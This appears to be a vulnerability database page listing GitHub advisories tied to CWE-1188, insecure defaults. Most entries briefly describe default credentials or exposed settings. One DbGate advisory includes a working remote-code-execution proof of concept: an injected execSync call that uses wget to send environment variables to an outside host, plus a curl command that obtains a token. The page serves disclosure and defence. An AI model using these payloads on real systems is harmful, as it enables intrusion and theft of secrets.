CWE-1188
AllowedInitialization of a Resource with an Insecure Default
Abstraction: Base · Status: Incomplete
The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
402 vulnerabilities reference this CWE, most recent first.
GHSA-85XP-66C9-65FX
Vulnerability from github – Published: 2025-05-30 00:31 – Updated: 2025-05-30 00:31The CS5000 Fire Panel is vulnerable due to a default account that exists on the panel. Even though it is possible to change this by SSHing into the device, it has remained unchanged on every installed system observed. This account is not root but holds high-level permissions that could severely impact the device's operation if exploited.
{
"affected": [],
"aliases": [
"CVE-2025-41438"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-30T00:15:23Z",
"severity": "CRITICAL"
},
"details": "The CS5000 Fire Panel is vulnerable due to a default account that exists\n on the panel. Even though it is possible to change this by SSHing into \nthe device, it has remained unchanged on every installed system \nobserved. This account is not root but holds high-level permissions that\n could severely impact the device\u0027s operation if exploited.",
"id": "GHSA-85xp-66c9-65fx",
"modified": "2025-05-30T00:31:14Z",
"published": "2025-05-30T00:31:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41438"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-03"
},
{
"type": "WEB",
"url": "https://www.consiliumsafety.com/en/support"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-864F-7XJM-2JP2
Vulnerability from github – Published: 2025-04-25 06:30 – Updated: 2025-05-05 21:57CNCF K3s 1.32 before 1.32.4-rc1+k3s1 has a Kubernetes kubelet configuration change with the unintended consequence that, in some situations, ReadOnlyPort is set to 10255. For example, the default behavior of a K3s online installation might allow unauthenticated access to this port, exposing credentials.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/k3s-io/k3s"
},
"ranges": [
{
"events": [
{
"introduced": "1.32.0-rc1"
},
{
"fixed": "1.32.4-rc1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-46599"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-25T15:07:32Z",
"nvd_published_at": "2025-04-25T05:15:33Z",
"severity": "MODERATE"
},
"details": "CNCF K3s 1.32 before 1.32.4-rc1+k3s1 has a Kubernetes kubelet configuration change with the unintended consequence that, in some situations, ReadOnlyPort is set to 10255. For example, the default behavior of a K3s online installation might allow unauthenticated access to this port, exposing credentials.",
"id": "GHSA-864f-7xjm-2jp2",
"modified": "2025-05-05T21:57:30Z",
"published": "2025-04-25T06:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46599"
},
{
"type": "WEB",
"url": "https://github.com/f1veT/BUG/issues/2"
},
{
"type": "WEB",
"url": "https://github.com/k3s-io/k3s/issues/12164"
},
{
"type": "WEB",
"url": "https://github.com/k3s-io/k3s/commit/097b63e588e3c844cdf9b967bcd0a69f4fc0aa0a"
},
{
"type": "WEB",
"url": "https://cloud.google.com/kubernetes-engine/docs/how-to/disable-kubelet-readonly-port"
},
{
"type": "PACKAGE",
"url": "https://github.com/k3s-io/k3s"
},
{
"type": "WEB",
"url": "https://github.com/k3s-io/k3s/compare/v1.32.3+k3s1...v1.32.4-rc1+k3s1"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3646"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "CNCF K3s Kubernetes kubelet configuration exposes credentials"
}
GHSA-8CJR-R29R-M28V
Vulnerability from github – Published: 2022-08-13 00:00 – Updated: 2022-08-17 00:00In WiFi, there is a possible disclosure of WiFi password to the end user due to an insecure default value. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-143534321
{
"affected": [],
"aliases": [
"CVE-2022-20342"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-12T15:15:00Z",
"severity": "LOW"
},
"details": "In WiFi, there is a possible disclosure of WiFi password to the end user due to an insecure default value. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-143534321",
"id": "GHSA-8cjr-r29r-m28v",
"modified": "2022-08-17T00:00:33Z",
"published": "2022-08-13T00:00:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20342"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/android-13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8H6X-WRC8-G9XC
Vulnerability from github – Published: 2022-05-21 00:01 – Updated: 2022-06-02 00:00A vulnerability has been identified in SIMATIC PCS 7 V9.0 and earlier (All versions), SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC Runtime Professional V16 and earlier (All versions), SIMATIC WinCC Runtime Professional V17 (All versions), SIMATIC WinCC V7.4 and earlier (All versions), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 8). An authenticated attacker could escape the WinCC Kiosk Mode by opening the printer dialog in the affected application in case no printer is installed.
{
"affected": [],
"aliases": [
"CVE-2022-24287"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-05-20T13:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in SIMATIC PCS 7 V9.0 and earlier (All versions), SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC Runtime Professional V16 and earlier (All versions), SIMATIC WinCC Runtime Professional V17 (All versions), SIMATIC WinCC V7.4 and earlier (All versions), SIMATIC WinCC V7.5 (All versions \u003c V7.5 SP2 Update 8). An authenticated attacker could escape the WinCC Kiosk Mode by opening the printer dialog in the affected application in case no printer is installed.",
"id": "GHSA-8h6x-wrc8-g9xc",
"modified": "2022-06-02T00:00:34Z",
"published": "2022-05-21T00:01:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24287"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-363107.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8HJ4-PMP7-HG69
Vulnerability from github – Published: 2022-05-13 01:46 – Updated: 2022-05-13 01:46A vulnerability in AsyncOS for the Cisco Web Security Appliance (WSA) could allow an unauthenticated, local attacker to log in to the device with the privileges of a limited user or an unauthenticated, remote attacker to authenticate to certain areas of the web GUI, aka a Static Credentials Vulnerability. Affected Products: virtual and hardware versions of Cisco Web Security Appliance (WSA). More Information: CSCve06124. Known Affected Releases: 10.1.0-204. Known Fixed Releases: 10.5.1-270.
{
"affected": [],
"aliases": [
"CVE-2017-6750"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-25T19:29:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in AsyncOS for the Cisco Web Security Appliance (WSA) could allow an unauthenticated, local attacker to log in to the device with the privileges of a limited user or an unauthenticated, remote attacker to authenticate to certain areas of the web GUI, aka a Static Credentials Vulnerability. Affected Products: virtual and hardware versions of Cisco Web Security Appliance (WSA). More Information: CSCve06124. Known Affected Releases: 10.1.0-204. Known Fixed Releases: 10.5.1-270.",
"id": "GHSA-8hj4-pmp7-hg69",
"modified": "2022-05-13T01:46:46Z",
"published": "2022-05-13T01:46:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6750"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170719-wsa4"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99924"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038958"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8M73-W2R2-6XXJ
Vulnerability from github – Published: 2020-07-29 17:29 – Updated: 2023-03-03 00:01This affects all versions of package UmbracoForms. When using the default configuration for upload forms, it is possible to upload arbitrary file types. The package offers a way for users to mitigate the issue. The users of this package can create a custom workflow and frontend validation that blocks certain file types, depending on their security needs and policies.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "UmbracoForms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "8.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7685"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2020-07-29T17:28:16Z",
"nvd_published_at": "2020-07-28T17:15:00Z",
"severity": "HIGH"
},
"details": "This affects all versions of package UmbracoForms. When using the default configuration for upload forms, it is possible to upload arbitrary file types. The package offers a way for users to mitigate the issue. The users of this package can create a custom workflow and frontend validation that blocks certain file types, depending on their security needs and policies.",
"id": "GHSA-8m73-w2r2-6xxj",
"modified": "2023-03-03T00:01:57Z",
"published": "2020-07-29T17:29:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7685"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-DOTNET-UMBRACOFORMS-595765"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Insecure defaults in UmbracoForms"
}
GHSA-8MWR-27X6-VJ6V
Vulnerability from github – Published: 2022-05-13 01:35 – Updated: 2022-05-13 01:35Martem TELEM GW6/GWM versions prior to 2.0.87-4018403-k4 may allow unprivileged users to modify/upload a new system configuration or take the full control over the RTU using default credentials to connect to the RTU.
{
"affected": [],
"aliases": [
"CVE-2018-10605"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-01T16:29:00Z",
"severity": "HIGH"
},
"details": "Martem TELEM GW6/GWM versions prior to 2.0.87-4018403-k4 may allow unprivileged users to modify/upload a new system configuration or take the full control over the RTU using default credentials to connect to the RTU.",
"id": "GHSA-8mwr-27x6-vj6v",
"modified": "2022-05-13T01:35:00Z",
"published": "2022-05-13T01:35:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10605"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-142-01"
},
{
"type": "WEB",
"url": "https://martem.eu/csa/Martem_CSA_Telem_1805183.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8Q86-4X73-99V8
Vulnerability from github – Published: 2024-02-26 18:30 – Updated: 2025-02-26 00:32The EDS-4000/G4000 Series prior to version 3.2 includes IP forwarding capabilities that users cannot deactivate. An attacker may be able to send requests to the product and have it forwarded to the target. An attacker can bypass access controls or hide the source of malicious requests.
{
"affected": [],
"aliases": [
"CVE-2024-0387"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-441"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-26T16:27:49Z",
"severity": "MODERATE"
},
"details": "The EDS-4000/G4000 Series prior to version 3.2 includes IP forwarding capabilities that users cannot deactivate. An attacker may be able to send requests to the product and have it forwarded to the target. An attacker can bypass access controls or hide the source of malicious requests.",
"id": "GHSA-8q86-4x73-99v8",
"modified": "2025-02-26T00:32:11Z",
"published": "2024-02-26T18:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0387"
},
{
"type": "WEB",
"url": "https://www.moxa.com/en/support/product-support/security-advisory/mpsa-237129-eds-4000-g4000-series-ip-forwarding-vulnerability?viewmode=0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-8RQ8-HFWR-4P7V
Vulnerability from github – Published: 2025-09-29 18:33 – Updated: 2025-09-29 18:33VMware Aria Operations contains an information disclosure vulnerability. A malicious actor with non-administrative privileges in Aria Operations may exploit this vulnerability to disclose credentials of other users of Aria Operations.
{
"affected": [],
"aliases": [
"CVE-2025-41245"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-29T17:15:31Z",
"severity": "MODERATE"
},
"details": "VMware Aria Operations contains an information disclosure vulnerability.\u00a0A malicious actor with non-administrative privileges in Aria Operations may exploit this vulnerability to disclose credentials of other users of Aria Operations.",
"id": "GHSA-8rq8-hfwr-4p7v",
"modified": "2025-09-29T18:33:13Z",
"published": "2025-09-29T18:33:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41245"
},
{
"type": "WEB",
"url": "http://support.broadcom.com/group/ecx/support-content-view/-/support-content/Security%20Advisories/VMSA-2025-0015--VMware-Aria-Operations-and-VMware-Tools-updates-address-multiple-vulnerabilities--CVE-2025-41244-CVE-2025-41245--CVE-2025-41246-/36149"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8V3Q-9VMX-36VC
Vulnerability from github – Published: 2026-06-05 16:25 – Updated: 2026-06-05 16:25Summary
DbGate's JSON script runner (POST /runners/start) allows remote code execution via code injection in the functionName parameter of JSON script assign commands. The functionName value is interpolated directly into dynamically generated JavaScript source code via string concatenation. The generated code is then executed in a forked Node.js child process.
Details
Step 1: User Input Entry Point
File: packages/api/src/controllers/runners.js - start() method
The /runners/start endpoint accepts a POST body containing a script object. When script.type == 'json', the request follows a different code path than raw shell scripts:
async start({ script }, req) {
if (script.type == 'json') {
if (!platformInfo.isElectron) {
if (!checkSecureDirectoriesInScript(script)) {
return { errorMessage: 'Unallowed directories in script' };
}
}
logJsonRunnerScript(req, script);
const js = await jsonScriptToJavascript(script);
return this.startCore(runid, scriptTemplate(js, false));
}
This path skips:
1. The run-shell-script permission check
2. The allowShellScripting platform-level check
The only validation performed is checkSecureDirectoriesInScript(), which props.fileName values
Step 2: JSON-to-JavaScript Conversion (Injection Point)
File: packages/tools/src/ScriptWriter.ts - assignCore() method
The JSON script's commands array contains objects with type: "assign". The assignCore method generates JavaScript by direct string concatenation of user-controlled values:
assignCore(variableName, functionName, props) {
this._put(`const ${variableName} = await ${functionName}(${JSON.stringify(props)});`);
}
Both variableName and functionName are attacker-controlled values taken directly from the JSON request body and interpolated into the generated JavaScript source code.
Step 3: Function Name Compilation
File: packages/tools/src/packageTools.ts - compileShellApiFunctionName()
Before interpolation, functionName passes through this function:
export function compileShellApiFunctionName(functionName) {
const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
if (nsMatch) {
return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
}
return `dbgateApi.${functionName}`;
}
An attacker supplying functionName: "x;MALICIOUS_CODE;//" gets:
dbgateApi.x;MALICIOUS_CODE;//
This is syntactically valid JavaScript: dbgateApi.x evaluates (and is discarded), MALICIOUS_CODE executes, and // comments out the trailing (${JSON.stringify(props)});.
Step 4: Generated JavaScript Template
The complete generated script that gets executed:
const dbgateApi = require(process.env.DBGATE_API);
require = null;
async function run() {
const x = await dbgateApi.x;process.mainModule.require('child_process').execSync('wget <attacker host>');//({});
await dbgateApi.finalizer.run();
}
dbgateApi.runScript(run);
Step 5: Execution via child_process.fork()
File: packages/api/src/controllers/runners.js - startCore() method
The generated JavaScript string is written to a temporary file and executed as a new Node.js process via child_process.fork(). This provides the attacker with a full Node.js runtime, including access to process, child_process, fs, net, and all other Node.js built-in modules.
The require = null sandbox can be bypassed via:
- process.mainModule.require() - separate reference unaffected by the null assignment
- module.constructor._load() - internal module loader, also unaffected
Additional Injection Points
The same unsanitised string interpolation pattern exists in:
| Endpoint | Parameter | File |
|---|---|---|
POST /runners/start |
functionName in assign commands |
ScriptWriter.ts - assignCore() |
POST /runners/start |
variableName in assign commands |
ScriptWriter.ts - assignCore() |
POST /runners/load-reader |
functionName parameter |
ScriptWriter.ts - loaderScriptTemplate |
PoC
POST /runners/start HTTP/1.1
Host: <dbgate-instance>:3000
Authorization: Bearer <token>
Content-Type: application/json
{
"script": {
"type": "json",
"commands": [
{
"type": "assign",
"variableName": "x",
"functionName": "x;process.mainModule.require('child_process').execSync('wget --post-data \"$(env 2>1&)\" <out of band host>');//",
"props": {}
}
],
"packageNames": []
}
}
The request to the out of band host was as follows:
POST / HTTP/1.1
Host: <out of band host>
User-Agent: Wget/1.21.3
Accept: */*
Accept-Encoding: identity
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 251
NODE_VERSION=22.22.2
HOSTNAME=4714c7a7405f
YARN_VERSION=1.22.22
HOME=/root
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DBGATE_API=/home/dbgate-docker/bundle.js
PWD=/root/.dbgate/run/16c2e85a-8512-4a7e-8678-391637bbdc2c
A bearer token is required to reach the endpoint, but in what appears to be the default deployment, authentication is disabled. Authentication needs to be explicitly set via environment variables. If this has not been explicitly set, per the defaults, a token can be retrieved using:
curl -sk -H "Content-Type: application/json" -d '{"amoid":"none"}' <dbgate-instance>:3000/auth/login
Impact
| Scenario | Impact | CVSS Score | CVSS Vector |
|---|---|---|---|
Anonymous auth mode (default deployment) (authProvider: "Anonymous") |
Unauthenticated RCE | 10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Authenticated deployment | Authenticated RCE - any user with API access | 9.9 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Timeline
| Date | Event |
|---|---|
| 2026-03-31 | Vulnerability discovered |
| 2026-04-07 | Advisory report prepared and submitted to maintainer |
| 2026-04-22 | Fix released (v7.1.9) |
| 2026-04-24 | Maintainer acknowledgment |
| 2026-05-20 | Public disclosure |
Acknowledgements
- Discovery assisted by Neo from @ProjectDiscovery
- Initial research direction inspired by @H0j3n — https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.1.8"
},
"package": {
"ecosystem": "npm",
"name": "dbgate-serve"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.1.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47668"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-20",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-05T16:25:23Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nDbGate\u0027s JSON script runner (`POST /runners/start`) allows remote code execution via code injection in the `functionName` parameter of JSON script `assign` commands. The `functionName` value is interpolated directly into dynamically generated JavaScript source code via string concatenation. The generated code is then executed in a forked Node.js child process.\n\n### Details\n#### Step 1: User Input Entry Point\n\n**File:** `packages/api/src/controllers/runners.js` - `start()` method\n\nThe `/runners/start` endpoint accepts a POST body containing a `script` object. When `script.type == \u0027json\u0027`, the request follows a different code path than raw shell scripts:\n\n```javascript\nasync start({ script }, req) {\n if (script.type == \u0027json\u0027) {\n if (!platformInfo.isElectron) {\n if (!checkSecureDirectoriesInScript(script)) {\n return { errorMessage: \u0027Unallowed directories in script\u0027 };\n }\n }\n logJsonRunnerScript(req, script);\n const js = await jsonScriptToJavascript(script);\n return this.startCore(runid, scriptTemplate(js, false));\n }\n```\nThis path skips:\n1. The `run-shell-script` permission check\n2. The `allowShellScripting` platform-level check\n\nThe only validation performed is `checkSecureDirectoriesInScript()`, which `props.fileName` values\n\n---\n\n#### Step 2: JSON-to-JavaScript Conversion (Injection Point)\n\n**File:** `packages/tools/src/ScriptWriter.ts` - `assignCore()` method\n\nThe JSON script\u0027s `commands` array contains objects with `type: \"assign\"`. The `assignCore` method generates JavaScript by direct string concatenation of user-controlled values:\n\n```typescript\nassignCore(variableName, functionName, props) {\n this._put(`const ${variableName} = await ${functionName}(${JSON.stringify(props)});`);\n}\n```\n\nBoth `variableName` and `functionName` are attacker-controlled values taken directly from the JSON request body and interpolated into the generated JavaScript source code.\n\n---\n\n#### Step 3: Function Name Compilation\n\n**File:** `packages/tools/src/packageTools.ts` - `compileShellApiFunctionName()`\n\nBefore interpolation, `functionName` passes through this function:\n\n```typescript\nexport function compileShellApiFunctionName(functionName) {\n const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);\n if (nsMatch) {\n return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;\n }\n return `dbgateApi.${functionName}`;\n}\n```\n\nAn attacker supplying `functionName: \"x;MALICIOUS_CODE;//\"` gets:\n```\ndbgateApi.x;MALICIOUS_CODE;//\n```\n\nThis is syntactically valid JavaScript: `dbgateApi.x` evaluates (and is discarded), `MALICIOUS_CODE` executes, and `//` comments out the trailing `(${JSON.stringify(props)});`.\n\n---\n\n#### Step 4: Generated JavaScript Template\n\nThe complete generated script that gets executed:\n\n```javascript\nconst dbgateApi = require(process.env.DBGATE_API);\nrequire = null;\nasync function run() {\n const x = await dbgateApi.x;process.mainModule.require(\u0027child_process\u0027).execSync(\u0027wget \u003cattacker host\u003e\u0027);//({});\n await dbgateApi.finalizer.run();\n}\ndbgateApi.runScript(run);\n```\n\n#### Step 5: Execution via child_process.fork()\n\n**File:** `packages/api/src/controllers/runners.js` - `startCore()` method\n\nThe generated JavaScript string is written to a temporary file and executed as a new Node.js process via `child_process.fork()`. This provides the attacker with a full Node.js runtime, including access to `process`, `child_process`, `fs`, `net`, and all other Node.js built-in modules.\n\nThe `require = null` sandbox can be bypassed via:\n- `process.mainModule.require()` - separate reference unaffected by the null assignment\n- `module.constructor._load()` - internal module loader, also unaffected\n---\n\n#### Additional Injection Points\n\nThe same unsanitised string interpolation pattern exists in:\n\n| Endpoint | Parameter | File |\n|----------|-----------|------|\n| `POST /runners/start` | `functionName` in assign commands | `ScriptWriter.ts` - `assignCore()` |\n| `POST /runners/start` | `variableName` in assign commands | `ScriptWriter.ts` - `assignCore()` |\n| `POST /runners/load-reader` | `functionName` parameter | `ScriptWriter.ts` - `loaderScriptTemplate` |\n\n### PoC\n```http\nPOST /runners/start HTTP/1.1\nHost: \u003cdbgate-instance\u003e:3000\nAuthorization: Bearer \u003ctoken\u003e\nContent-Type: application/json\n\n{\n \"script\": {\n \"type\": \"json\",\n \"commands\": [\n {\n \"type\": \"assign\",\n \"variableName\": \"x\",\n \"functionName\": \"x;process.mainModule.require(\u0027child_process\u0027).execSync(\u0027wget --post-data \\\"$(env 2\u003e1\u0026)\\\" \u003cout of band host\u003e\u0027);//\",\n \"props\": {}\n }\n ],\n \"packageNames\": []\n }\n}\n```\n\nThe request to the out of band host was as follows:\n\n```http\nPOST / HTTP/1.1\nHost: \u003cout of band host\u003e\nUser-Agent: Wget/1.21.3\nAccept: */*\nAccept-Encoding: identity\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 251\n\nNODE_VERSION=22.22.2\nHOSTNAME=4714c7a7405f\nYARN_VERSION=1.22.22\nHOME=/root\nTERM=xterm\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nDBGATE_API=/home/dbgate-docker/bundle.js\nPWD=/root/.dbgate/run/16c2e85a-8512-4a7e-8678-391637bbdc2c\n```\n\n---\n\nA bearer token is required to reach the endpoint, but in what appears to be the default deployment, authentication is disabled. Authentication needs to be explicitly set via environment variables. If this has not been explicitly set, per the defaults, a token can be retrieved using:\n\n```bash\ncurl -sk -H \"Content-Type: application/json\" -d \u0027{\"amoid\":\"none\"}\u0027 \u003cdbgate-instance\u003e:3000/auth/login\n```\n\n### Impact\n\n| Scenario | Impact | CVSS Score | CVSS Vector | \n|----------|--------|--------|--------|\n| Anonymous auth mode (default deployment) (`authProvider: \"Anonymous\"`) | Unauthenticated RCE | 10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |\n| Authenticated deployment | Authenticated RCE - any user with API access | 9.9 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |\n\n### Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-03-31 | Vulnerability discovered |\n| 2026-04-07 | Advisory report prepared and submitted to maintainer |\n| 2026-04-22 | Fix released (v7.1.9) |\n| 2026-04-24 | Maintainer acknowledgment |\n| 2026-05-20 | Public disclosure |\n\n### Acknowledgements\n\n- Discovery assisted by Neo from @ProjectDiscovery\n- Initial research direction inspired by @H0j3n \u2014 https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml",
"id": "GHSA-8v3q-9vmx-36vc",
"modified": "2026-06-05T16:25:23Z",
"published": "2026-06-05T16:25:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc"
},
{
"type": "PACKAGE",
"url": "https://github.com/dbgate/dbgate"
},
{
"type": "WEB",
"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9"
},
{
"type": "WEB",
"url": "https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "DbGate: Unauthenticated Remote Code Execution via JSON Script Runner"
}
No mitigation information available for this CWE.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.